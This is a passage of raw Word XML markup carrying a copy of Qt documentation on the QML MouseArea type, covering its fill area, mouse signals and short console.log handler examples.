        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component), then the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2211" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">will fill the area defined by the parent's dimensions. </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alternatively</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, an area </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smaller or larger than the parent is definable</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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id</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button</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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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anchors</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fill</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parent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onClicked</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"button clicked"</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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width</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>150</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>75</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onClicked</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"irregular area clicked"</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1865" w:name="receiving-events"/>
      <w:bookmarkStart w:id="1866" w:name="_Toc483000934"/>
      <w:bookmarkStart w:id="1867" w:name="_Toc483003925"/>
      <w:bookmarkStart w:id="1868" w:name="_Toc483604277"/>
      <w:bookmarkStart w:id="1869" w:name="_Toc483605497"/>
      <w:bookmarkEnd w:id="1865"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Receiving Events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1866"/>
      <w:bookmarkEnd w:id="1867"/>
      <w:bookmarkEnd w:id="1868"/>
      <w:bookmarkEnd w:id="1869"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2212" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type provides</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2213" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signals and handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to detect different mouse events. The</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2214" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type documentation describes these gestures in greater detail:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>canceled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>clicked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>doubleClicked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>entered</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>exited</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>positionChanged</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pressAndHold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pressed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>released</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These signals have signal handlers that are invoked when the signals are emitted.</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w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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anchors</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fill</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parent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onClicked</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"area clicked"</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onDoubleClicked</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"area double clicked"</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onEntered</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
